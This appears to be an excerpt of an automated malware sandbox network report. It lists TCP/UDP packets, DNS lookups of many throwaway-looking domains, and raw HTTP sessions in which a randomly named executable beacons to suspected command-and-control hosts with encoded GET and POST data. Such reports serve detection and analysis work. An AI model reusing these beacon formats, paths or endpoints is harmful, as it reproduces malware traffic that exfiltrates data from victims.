                  Jul 3, 2024 10:53:35.700603008 CEST4974980192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:35.705538988 CEST80497493.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:36.732845068 CEST4975080192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:36.737859011 CEST80497503.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:36.737934113 CEST4975080192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:36.740550995 CEST4975080192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:36.745517015 CEST80497503.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:36.745568991 CEST80497503.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:37.213330984 CEST80497503.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:37.216869116 CEST4975080192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:38.246234894 CEST4975080192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:38.251174927 CEST80497503.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:39.264786959 CEST4975180192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:39.269756079 CEST80497513.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:39.274671078 CEST4975180192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:39.277683973 CEST4975180192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:39.282520056 CEST80497513.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:39.740819931 CEST80497513.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:39.740843058 CEST80497513.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:39.741913080 CEST4975180192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:39.746608019 CEST4975180192.168.2.113.33.244.179
                  Jul 3, 2024 10:53:39.751569033 CEST80497513.33.244.179192.168.2.11
                  Jul 3, 2024 10:53:44.765805006 CEST4975280192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:44.770803928 CEST8049752104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:44.770915985 CEST4975280192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:44.773061037 CEST4975280192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:44.777877092 CEST8049752104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:45.389847994 CEST8049752104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:45.390686035 CEST8049752104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:45.390804052 CEST4975280192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:46.276711941 CEST4975280192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:47.296660900 CEST4975380192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:47.302433014 CEST8049753104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:47.306629896 CEST4975380192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:47.306629896 CEST4975380192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:47.311580896 CEST8049753104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:48.018042088 CEST8049753104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:48.018349886 CEST8049753104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:48.022569895 CEST4975380192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:48.807918072 CEST4975380192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:49.826879978 CEST4975480192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:49.831861019 CEST8049754104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:49.834757090 CEST4975480192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:49.838572979 CEST4975480192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:49.843430996 CEST8049754104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:49.843485117 CEST8049754104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:50.463789940 CEST8049754104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:50.465200901 CEST8049754104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:50.465264082 CEST4975480192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:51.341372967 CEST4975480192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:52.358313084 CEST4975580192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:52.363301992 CEST8049755104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:52.363423109 CEST4975580192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:52.365255117 CEST4975580192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:52.370065928 CEST8049755104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:53.031018019 CEST8049755104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:53.031183004 CEST8049755104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:53.031243086 CEST4975580192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:53.033781052 CEST4975580192.168.2.11104.21.21.230
                  Jul 3, 2024 10:53:53.039808989 CEST8049755104.21.21.230192.168.2.11
                  Jul 3, 2024 10:53:58.064570904 CEST4975680192.168.2.1174.208.46.171
                  Jul 3, 2024 10:53:58.069484949 CEST804975674.208.46.171192.168.2.11
                  Jul 3, 2024 10:53:58.069611073 CEST4975680192.168.2.1174.208.46.171
                  Jul 3, 2024 10:53:58.072606087 CEST4975680192.168.2.1174.208.46.171
                  Jul 3, 2024 10:53:58.077599049 CEST804975674.208.46.171192.168.2.11
                  Jul 3, 2024 10:53:58.601106882 CEST804975674.208.46.171192.168.2.11
                  Jul 3, 2024 10:53:58.601167917 CEST804975674.208.46.171192.168.2.11
                  Jul 3, 2024 10:53:58.601224899 CEST4975680192.168.2.1174.208.46.171
                  Jul 3, 2024 10:53:59.573978901 CEST4975680192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:00.592170954 CEST4975780192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:00.598737955 CEST804975774.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:00.598880053 CEST4975780192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:00.600840092 CEST4975780192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:00.606060982 CEST804975774.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:01.120146990 CEST804975774.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:01.120174885 CEST804975774.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:01.120371103 CEST4975780192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:02.104960918 CEST4975780192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:03.124452114 CEST4975880192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:03.131239891 CEST804975874.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:03.131320953 CEST4975880192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:03.133364916 CEST4975880192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:03.138530970 CEST804975874.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:03.139755964 CEST804975874.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:03.750207901 CEST804975874.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:03.750597000 CEST804975874.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:03.754776955 CEST4975880192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:04.636045933 CEST4975880192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:05.656163931 CEST4975980192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:05.661127090 CEST804975974.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:05.662755966 CEST4975980192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:05.666165113 CEST4975980192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:05.671036005 CEST804975974.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:06.286864996 CEST804975974.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:06.288466930 CEST804975974.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:06.288526058 CEST4975980192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:06.291235924 CEST4975980192.168.2.1174.208.46.171
                  Jul 3, 2024 10:54:06.297517061 CEST804975974.208.46.171192.168.2.11
                  Jul 3, 2024 10:54:14.423882008 CEST4976080192.168.2.11118.99.50.8
                  Jul 3, 2024 10:54:14.428963900 CEST8049760118.99.50.8192.168.2.11
                  Jul 3, 2024 10:54:14.429081917 CEST4976080192.168.2.11118.99.50.8
                  Jul 3, 2024 10:54:14.433928967 CEST4976080192.168.2.11118.99.50.8
                  Jul 3, 2024 10:54:14.439059019 CEST8049760118.99.50.8192.168.2.11
                  Jul 3, 2024 10:54:15.362982035 CEST8049760118.99.50.8192.168.2.11
                  Jul 3, 2024 10:54:15.363149881 CEST8049760118.99.50.8192.168.2.11
                  Jul 3, 2024 10:54:15.363574028 CEST4976080192.168.2.11118.99.50.8
                  Jul 3, 2024 10:54:15.368813992 CEST4976080192.168.2.11118.99.50.8
                  Jul 3, 2024 10:54:15.373716116 CEST8049760118.99.50.8192.168.2.11

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 3, 2024 10:50:50.465136051 CEST4992953192.168.2.111.1.1.1
                  Jul 3, 2024 10:50:51.083813906 CEST53499291.1.1.1192.168.2.11
                  Jul 3, 2024 10:51:07.125380039 CEST6516153192.168.2.111.1.1.1
                  Jul 3, 2024 10:51:07.136548042 CEST53651611.1.1.1192.168.2.11
                  Jul 3, 2024 10:51:15.202462912 CEST5300553192.168.2.111.1.1.1
                  Jul 3, 2024 10:51:15.233519077 CEST53530051.1.1.1192.168.2.11
                  Jul 3, 2024 10:51:33.874119997 CEST5141553192.168.2.111.1.1.1
                  Jul 3, 2024 10:51:34.215791941 CEST53514151.1.1.1192.168.2.11
                  Jul 3, 2024 10:51:42.280157089 CEST6374553192.168.2.111.1.1.1
                  Jul 3, 2024 10:51:42.290940046 CEST53637451.1.1.1192.168.2.11
                  Jul 3, 2024 10:51:50.358809948 CEST5384753192.168.2.111.1.1.1
                  Jul 3, 2024 10:51:50.843497992 CEST53538471.1.1.1192.168.2.11
                  Jul 3, 2024 10:52:03.968764067 CEST5451653192.168.2.111.1.1.1
                  Jul 3, 2024 10:52:04.417825937 CEST53545161.1.1.1192.168.2.11
                  Jul 3, 2024 10:52:17.906510115 CEST5855253192.168.2.111.1.1.1
                  Jul 3, 2024 10:52:17.919965029 CEST53585521.1.1.1192.168.2.11
                  Jul 3, 2024 10:52:25.992536068 CEST6358553192.168.2.111.1.1.1
                  Jul 3, 2024 10:52:26.007946968 CEST53635851.1.1.1192.168.2.11
                  Jul 3, 2024 10:52:39.142529011 CEST5355453192.168.2.111.1.1.1
                  Jul 3, 2024 10:52:40.151921988 CEST5355453192.168.2.111.1.1.1
                  Jul 3, 2024 10:52:40.193031073 CEST53535541.1.1.1192.168.2.11
                  Jul 3, 2024 10:52:40.193044901 CEST53535541.1.1.1192.168.2.11
                  Jul 3, 2024 10:52:43.231481075 CEST5913553192.168.2.111.1.1.1
                  Jul 3, 2024 10:52:43.242959023 CEST53591351.1.1.1192.168.2.11
                  Jul 3, 2024 10:52:48.249289989 CEST5938553192.168.2.111.1.1.1
                  Jul 3, 2024 10:52:48.355214119 CEST53593851.1.1.1192.168.2.11
                  Jul 3, 2024 10:53:02.311994076 CEST5092253192.168.2.111.1.1.1
                  Jul 3, 2024 10:53:02.542828083 CEST53509221.1.1.1192.168.2.11
                  Jul 3, 2024 10:53:16.032546043 CEST5980053192.168.2.111.1.1.1
                  Jul 3, 2024 10:53:16.896552086 CEST53598001.1.1.1192.168.2.11
                  Jul 3, 2024 10:53:30.515921116 CEST5651453192.168.2.111.1.1.1
                  Jul 3, 2024 10:53:31.513060093 CEST5651453192.168.2.111.1.1.1
                  Jul 3, 2024 10:53:31.642873049 CEST53565141.1.1.1192.168.2.11
                  Jul 3, 2024 10:53:31.642889977 CEST53565141.1.1.1192.168.2.11
                  Jul 3, 2024 10:53:44.749187946 CEST6011353192.168.2.111.1.1.1
                  Jul 3, 2024 10:53:44.763266087 CEST53601131.1.1.1192.168.2.11
                  Jul 3, 2024 10:53:58.046428919 CEST5016253192.168.2.111.1.1.1
                  Jul 3, 2024 10:53:58.061124086 CEST53501621.1.1.1192.168.2.11

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 3, 2024 10:50:50.465136051 CEST192.168.2.111.1.1.10xb8a7Standard query (0)www.zt555.shopA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:51:07.125380039 CEST192.168.2.111.1.1.10xfc3dStandard query (0)www.pista789.winA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:51:15.202462912 CEST192.168.2.111.1.1.10x249cStandard query (0)www.hawalaz.xyzA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:51:33.874119997 CEST192.168.2.111.1.1.10x7b8Standard query (0)www.dribbean.websiteA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:51:42.280157089 CEST192.168.2.111.1.1.10xb157Standard query (0)www.gzlhysuess.comA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:51:50.358809948 CEST192.168.2.111.1.1.10x217aStandard query (0)www.66hc7.comA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:03.968764067 CEST192.168.2.111.1.1.10x47dfStandard query (0)www.zl1l5r.websiteA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:17.906510115 CEST192.168.2.111.1.1.10x3dStandard query (0)www.xn--vct91ch7lruy.comA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:25.992536068 CEST192.168.2.111.1.1.10x886fStandard query (0)www.marismotivates.comA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:39.142529011 CEST192.168.2.111.1.1.10x1c7dStandard query (0)www.warcorpshs.comA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:40.151921988 CEST192.168.2.111.1.1.10x1c7dStandard query (0)www.warcorpshs.comA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:43.231481075 CEST192.168.2.111.1.1.10xba40Standard query (0)www.warcorpshs.comA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:48.249289989 CEST192.168.2.111.1.1.10xe4efStandard query (0)www.lecoinsa.netA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:53:02.311994076 CEST192.168.2.111.1.1.10xe40bStandard query (0)www.778981.comA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:53:16.032546043 CEST192.168.2.111.1.1.10x4b51Standard query (0)www.yetung.comA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:53:30.515921116 CEST192.168.2.111.1.1.10x5346Standard query (0)www.oliviacorepilates.comA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:53:31.513060093 CEST192.168.2.111.1.1.10x5346Standard query (0)www.oliviacorepilates.comA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:53:44.749187946 CEST192.168.2.111.1.1.10x4a54Standard query (0)www.personalcaresale.shopA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:53:58.046428919 CEST192.168.2.111.1.1.10x7535Standard query (0)www.lavillitadepapa.comA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 3, 2024 10:50:51.083813906 CEST1.1.1.1192.168.2.110xb8a7No error (0)www.zt555.shop118.99.50.8A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:51:07.136548042 CEST1.1.1.1192.168.2.110xfc3dName error (3)www.pista789.winnonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:51:15.233519077 CEST1.1.1.1192.168.2.110x249cNo error (0)www.hawalaz.xyz162.0.213.72A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:51:34.215791941 CEST1.1.1.1192.168.2.110x7b8Name error (3)www.dribbean.websitenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:51:42.290940046 CEST1.1.1.1192.168.2.110xb157Name error (3)www.gzlhysuess.comnonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:51:50.843497992 CEST1.1.1.1192.168.2.110x217aNo error (0)www.66hc7.comkloeti.pc205kopl.comCNAME (Canonical name)IN (0x0001)false
                  Jul 3, 2024 10:51:50.843497992 CEST1.1.1.1192.168.2.110x217aNo error (0)kloeti.pc205kopl.com162.209.189.210A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:51:50.843497992 CEST1.1.1.1192.168.2.110x217aNo error (0)kloeti.pc205kopl.com162.209.189.211A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:51:50.843497992 CEST1.1.1.1192.168.2.110x217aNo error (0)kloeti.pc205kopl.com162.209.189.212A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:04.417825937 CEST1.1.1.1192.168.2.110x47dfNo error (0)www.zl1l5r.website198.16.50.172A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:17.919965029 CEST1.1.1.1192.168.2.110x3dName error (3)www.xn--vct91ch7lruy.comnonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:26.007946968 CEST1.1.1.1192.168.2.110x886fNo error (0)www.marismotivates.commarismotivates.comCNAME (Canonical name)IN (0x0001)false
                  Jul 3, 2024 10:52:26.007946968 CEST1.1.1.1192.168.2.110x886fNo error (0)marismotivates.com3.33.130.190A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:26.007946968 CEST1.1.1.1192.168.2.110x886fNo error (0)marismotivates.com15.197.148.33A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:40.193031073 CEST1.1.1.1192.168.2.110x1c7dName error (3)www.warcorpshs.comnonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:40.193044901 CEST1.1.1.1192.168.2.110x1c7dName error (3)www.warcorpshs.comnonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:43.242959023 CEST1.1.1.1192.168.2.110xba40Name error (3)www.warcorpshs.comnonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 10:52:48.355214119 CEST1.1.1.1192.168.2.110xe4efNo error (0)www.lecoinsa.net217.116.0.191A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:53:02.542828083 CEST1.1.1.1192.168.2.110xe40bNo error (0)www.778981.comxjc-g1171-6-g-1584411309302y.onlinename11txcnddns.comCNAME (Canonical name)IN (0x0001)false
                  Jul 3, 2024 10:53:02.542828083 CEST1.1.1.1192.168.2.110xe40bNo error (0)xjc-g1171-6-g-1584411309302y.onlinename11txcnddns.comg1171-6-g-1584411309302y.greycdn.netCNAME (Canonical name)IN (0x0001)false
                  Jul 3, 2024 10:53:02.542828083 CEST1.1.1.1192.168.2.110xe40bNo error (0)g1171-6-g-1584411309302y.greycdn.netc96e98f1fy.greycdn.netCNAME (Canonical name)IN (0x0001)false
                  Jul 3, 2024 10:53:02.542828083 CEST1.1.1.1192.168.2.110xe40bNo error (0)c96e98f1fy.greycdn.net7a4ca695fd164z.greycdn.netCNAME (Canonical name)IN (0x0001)false
                  Jul 3, 2024 10:53:02.542828083 CEST1.1.1.1192.168.2.110xe40bNo error (0)7a4ca695fd164z.greycdn.net165.154.0.120A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:53:16.896552086 CEST1.1.1.1192.168.2.110x4b51No error (0)www.yetung.comyetung.com.lho0.faipod.comCNAME (Canonical name)IN (0x0001)false
                  Jul 3, 2024 10:53:16.896552086 CEST1.1.1.1192.168.2.110x4b51No error (0)yetung.com.lho0.faipod.com121.37.199.72A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:53:31.642873049 CEST1.1.1.1192.168.2.110x5346No error (0)www.oliviacorepilates.com3.33.244.179A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:53:31.642889977 CEST1.1.1.1192.168.2.110x5346No error (0)www.oliviacorepilates.com3.33.244.179A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:53:44.763266087 CEST1.1.1.1192.168.2.110x4a54No error (0)www.personalcaresale.shop104.21.21.230A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:53:44.763266087 CEST1.1.1.1192.168.2.110x4a54No error (0)www.personalcaresale.shop172.67.200.242A (IP address)IN (0x0001)false
                  Jul 3, 2024 10:53:58.061124086 CEST1.1.1.1192.168.2.110x7535No error (0)www.lavillitadepapa.com74.208.46.171A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • www.zt555.shop
                  • www.hawalaz.xyz
                  • www.66hc7.com
                  • www.zl1l5r.website
                  • www.marismotivates.com
                  • www.lecoinsa.net
                  • www.778981.com
                  • www.yetung.com
                  • www.oliviacorepilates.com
                  • www.personalcaresale.shop
                  • www.lavillitadepapa.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.1149718118.99.50.8801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:50:51.101381063 CEST409OUTGET /l25n/?Qb94=7vWTifjxU&ylT8el=auppmJM7eN7J/jcd3Cnnc7lcHiLNgr09bdvJbM3sU1/Dmtxph+2FzvX7ZDnD2EcIcX9RCCjXq1LDmMY1SoU+nq8rcMPpo2Cr+tMuRnJbKxq7CEWaX/NqKVE= HTTP/1.1
                  Host: www.zt555.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:50:51.965064049 CEST289INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:50:51 GMT
                  Content-Type: text/html
                  Content-Length: 146
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.1149720162.0.213.72801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:51:15.243486881 CEST669OUTPOST /f0fa/ HTTP/1.1
                  Host: www.hawalaz.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.hawalaz.xyz
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.hawalaz.xyz/f0fa/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 38 47 76 46 34 49 48 44 6b 78 66 52 53 42 30 72 5a 49 6d 4d 39 51 31 30 73 7a 42 79 48 74 33 37 6f 35 68 4e 4d 36 46 6c 4d 4a 48 6f 47 49 6f 42 58 7a 6b 67 6d 6e 50 75 59 69 65 2f 68 62 39 33 63 76 54 54 48 42 72 30 6e 36 64 66 4f 57 76 58 4c 50 69 70 7a 74 36 55 49 62 6b 74 61 2f 52 65 4d 55 34 54 6e 75 64 72 71 41 62 45 7a 59 46 66 6b 75 57 4a 63 62 2b 66 54 56 66 63 56 77 50 45 43 69 53 59 57 4e 51 49 4c 36 67 36 4f 75 30 32 64 41 4b 6b 48 38 65 78 37 6c 33 73 4b 55 2b 67 63 54 57 63 36 30 72 66 73 77 78 49 76 76 6d 63 36 79 2b 7a 50 68 61 52 4e 47 32 63 62 2f 6a 55 4b 67 3d 3d
                  Data Ascii: ylT8el=8GvF4IHDkxfRSB0rZImM9Q10szByHt37o5hNM6FlMJHoGIoBXzkgmnPuYie/hb93cvTTHBr0n6dfOWvXLPipzt6UIbkta/ReMU4TnudrqAbEzYFfkuWJcb+fTVfcVwPECiSYWNQIL6g6Ou02dAKkH8ex7l3sKU+gcTWc60rfswxIvvmc6y+zPhaRNG2cb/jUKg==


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.1149721162.0.213.72801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:51:17.776242971 CEST689OUTPOST /f0fa/ HTTP/1.1
                  Host: www.hawalaz.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.hawalaz.xyz
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.hawalaz.xyz/f0fa/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 38 47 76 46 34 49 48 44 6b 78 66 52 53 68 6f 72 59 72 4f 4d 37 77 31 33 6a 54 42 79 4a 4e 33 2f 6f 35 39 4e 4d 2b 64 31 4d 36 7a 6f 48 6f 59 42 57 33 51 67 68 6e 50 75 4e 53 65 36 38 72 39 38 63 76 57 73 48 41 58 30 6e 36 4a 66 4f 55 48 58 49 34 32 75 68 4e 36 57 54 4c 6b 76 48 76 52 65 4d 55 34 54 6e 71 4e 53 71 41 44 45 79 72 64 66 6b 4b 36 4b 66 62 2b 41 44 46 66 63 65 51 50 59 43 69 54 31 57 4d 4d 6d 4c 38 73 36 4f 76 45 32 64 52 4b 6e 49 38 65 4e 32 46 32 38 42 6b 44 46 59 52 48 44 37 6c 48 39 36 67 39 61 6e 4a 33 47 71 52 33 6b 4d 79 53 54 5a 67 58 73 53 4f 47 64 52 6e 73 4a 6d 42 54 50 42 38 61 67 49 49 56 6f 6d 75 59 45 74 49 45 3d
                  Data Ascii: ylT8el=8GvF4IHDkxfRShorYrOM7w13jTByJN3/o59NM+d1M6zoHoYBW3QghnPuNSe68r98cvWsHAX0n6JfOUHXI42uhN6WTLkvHvReMU4TnqNSqADEyrdfkK6Kfb+ADFfceQPYCiT1WMMmL8s6OvE2dRKnI8eN2F28BkDFYRHD7lH96g9anJ3GqR3kMySTZgXsSOGdRnsJmBTPB8agIIVomuYEtIE=


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.1149722162.0.213.72801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:51:20.319772959 CEST1702OUTPOST /f0fa/ HTTP/1.1
                  Host: www.hawalaz.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.hawalaz.xyz
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.hawalaz.xyz/f0fa/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
